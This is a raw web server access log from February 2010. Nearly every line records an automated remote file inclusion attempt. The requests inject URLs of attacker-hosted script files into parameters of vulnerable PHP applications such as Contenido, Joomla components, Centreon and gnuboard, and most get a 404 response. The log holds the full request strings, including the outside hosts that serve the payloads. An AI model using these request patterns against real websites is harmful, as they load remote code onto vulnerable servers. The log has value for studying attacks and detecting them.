60.251.165.181 - - [06/Feb/2010:18:08:07 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:08:21 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:08:31 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:08:32 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:10:26 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hsus-math.com.tw//appserv/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:10:26 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hsus-math.com.tw//appserv/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:10:26 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hsus-math.com.tw//appserv/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:10:40 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hsus-math.com.tw//appserv/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:10:41 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hsus-math.com.tw//appserv/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:10:41 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hsus-math.com.tw//appserv/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
60.251.165.181 - - [06/Feb/2010:18:13:40 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
60.251.165.181 - - [06/Feb/2010:18:13:40 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
60.251.165.181 - - [06/Feb/2010:18:13:40 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:20:15 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:20:20 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:20:20 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:20:26 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:20:26 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:20:26 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
210.114.175.110 - - [06/Feb/2010:18:21:55 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
210.114.175.110 - - [06/Feb/2010:18:21:55 -0800] "GET /logs/access.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
210.114.175.110 - - [06/Feb/2010:18:21:55 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
210.114.175.110 - - [06/Feb/2010:18:21:55 -0800] "GET /logs/access.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
210.114.175.110 - - [06/Feb/2010:18:21:56 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
210.114.175.110 - - [06/Feb/2010:18:21:56 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
217.70.129.162 - - [06/Feb/2010:18:24:59 -0800] "GET /logs/access.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
217.70.129.162 - - [06/Feb/2010:18:27:03 -0800] "GET /logs/access.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
143.248.146.168 - - [06/Feb/2010:18:31:30 -0800] "GET /////////?_SERVER[DOCUMENT_ROOT]=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 200 931 "-" "Mozilla/5.0" "allattitudedoxies.com"
143.248.146.168 - - [06/Feb/2010:18:31:31 -0800] "GET /////////?_SERVER[DOCUMENT_ROOT]=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 200 931 "-" "Mozilla/5.0" "allattitudedoxies.com"
143.248.146.168 - - [06/Feb/2010:18:31:37 -0800] "GET /logs/access.log//////////?_SERVER[DOCUMENT_ROOT]=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
143.248.146.168 - - [06/Feb/2010:18:31:39 -0800] "GET /logs/access.log//////////?_SERVER[DOCUMENT_ROOT]=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
143.248.146.168 - - [06/Feb/2010:18:31:39 -0800] "GET /logs//////////?_SERVER[DOCUMENT_ROOT]=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 200 1523 "-" "Mozilla/5.0" "allattitudedoxies.com"
143.248.146.168 - - [06/Feb/2010:18:31:39 -0800] "GET /logs//////////?_SERVER[DOCUMENT_ROOT]=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 200 1523 "-" "Mozilla/5.0" "allattitudedoxies.com"
143.248.146.168 - - [06/Feb/2010:18:32:17 -0800] "GET /logs/access.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
143.248.146.168 - - [06/Feb/2010:18:32:58 -0800] "GET /logs/access.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:36:10 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:36:13 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:18:36:13 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
202.131.226.52 - - [06/Feb/2010:18:50:20 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
202.131.226.52 - - [06/Feb/2010:18:50:20 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
202.131.226.52 - - [06/Feb/2010:18:51:24 -0800] "GET /logs/access.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:19:01:21 -0800] "GET /include/admin.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:19:01:21 -0800] "GET /logs/access.log/include/admin.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
151.1.253.1 - - [06/Feb/2010:19:01:21 -0800] "GET /logs/include/admin.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
81.176.226.164 - - [06/Feb/2010:19:02:40 -0800] "GET /include/admin.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
81.176.226.164 - - [06/Feb/2010:19:02:40 -0800] "GET /logs/access.log/include/admin.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
81.176.226.164 - - [06/Feb/2010:19:02:40 -0800] "GET /logs/include/admin.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:19:03:07 -0800] "GET /logs/access.log%20%20///bbs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:19:03:07 -0800] "GET //bbs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:19:03:07 -0800] "GET /logs///bbs//write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:07:15 -0800] "GET //bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:07:15 -0800] "GET /logs/access.log///bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:07:15 -0800] "GET /logs///bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:07:54 -0800] "GET /logs/access.log///bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://www.hsus-math.com.tw//appserv/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:07:54 -0800] "GET /logs///bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://www.hsus-math.com.tw//appserv/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:07:54 -0800] "GET //bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://www.hsus-math.com.tw//appserv/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:08:14 -0800] "GET /logs///bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:08:14 -0800] "GET //bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:08:14 -0800] "GET /logs/access.log///bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:13:10 -0800] "GET /logs/access.log%20%20///bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://www.hsus-math.com.tw//appserv/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:13:10 -0800] "GET //bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://www.hsus-math.com.tw//appserv/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:13:10 -0800] "GET /logs///bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://www.hsus-math.com.tw//appserv/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:13:13 -0800] "GET //bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:13:13 -0800] "GET /logs/access.log%20%20///bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:13:13 -0800] "GET /logs///bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:19:13:51 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:19:13:51 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:19:13:51 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:14:05 -0800] "GET //bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:14:05 -0800] "GET /logs///bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:14:05 -0800] "GET /logs/access.log%20%20///bbs//skin/jaemanstyle_s01_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
202.131.226.52 - - [06/Feb/2010:19:16:54 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
202.131.226.52 - - [06/Feb/2010:19:16:54 -0800] "GET /logs/access.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
202.131.226.52 - - [06/Feb/2010:19:16:54 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
81.176.226.164 - - [06/Feb/2010:19:17:55 -0800] "GET /logs/access.log%20%20/include/admin.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
202.131.226.52 - - [06/Feb/2010:19:19:15 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
202.131.226.52 - - [06/Feb/2010:19:19:15 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
202.131.226.52 - - [06/Feb/2010:19:19:15 -0800] "GET /logs/access.log%20%20/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:19:17 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:19:17 -0800] "GET /logs/access.log%20%20///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:19:17 -0800] "GET /logs/access.log%20%20///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:19:17 -0800] "GET /logs///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:19:17 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:19:17 -0800] "GET /logs///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:20:04 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:20:04 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:20:04 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:23:20 -0800] "GET /logs///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:23:20 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:23:20 -0800] "GET /logs/access_091002.log%20%20///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:23:29 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:23:29 -0800] "GET /logs///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:23:29 -0800] "GET /logs/access_091002.log%20%20///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:19:27:25 -0800] "GET /logs/access.log//main.php?sayfa=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:19:27:25 -0800] "GET /logs//main.php?sayfa=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:19:27:25 -0800] "GET /main.php?sayfa=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
212.128.144.98 - - [06/Feb/2010:19:27:52 -0800] "GET /logs/access_091002.log//config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
212.128.144.98 - - [06/Feb/2010:19:27:52 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
212.128.144.98 - - [06/Feb/2010:19:27:52 -0800] "GET /config/dbutil.bck.php?confdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:30:12 -0800] "GET /logs/access.log/include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:30:12 -0800] "GET /include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:30:12 -0800] "GET /logs/include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
83.133.64.184 - - [06/Feb/2010:19:31:30 -0800] "GET /config/dbutil.bck.php?confdir=http://ppkiajember.com/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
83.133.64.184 - - [06/Feb/2010:19:31:30 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://ppkiajember.com/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
83.133.64.184 - - [06/Feb/2010:19:31:30 -0800] "GET /logs/access_091002.log%20%20//config/dbutil.bck.php?confdir=http://ppkiajember.com/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:31:51 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:31:51 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.239.227.155 - - [06/Feb/2010:19:31:51 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:19:32:35 -0800] "GET /logs//main.php?sayfa=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:19:32:35 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
77.221.130.15 - - [06/Feb/2010:19:32:35 -0800] "GET /main.php?sayfa=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.125 - - [06/Feb/2010:19:34:08 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.125 - - [06/Feb/2010:19:34:08 -0800] "GET /logs///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
218.38.136.125 - - [06/Feb/2010:19:34:09 -0800] "GET /logs/access.log%20%20///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:43:53 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:43:53 -0800] "GET /logs///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:43:54 -0800] "GET /logs/access.log%20%20///include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:19:44:50 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
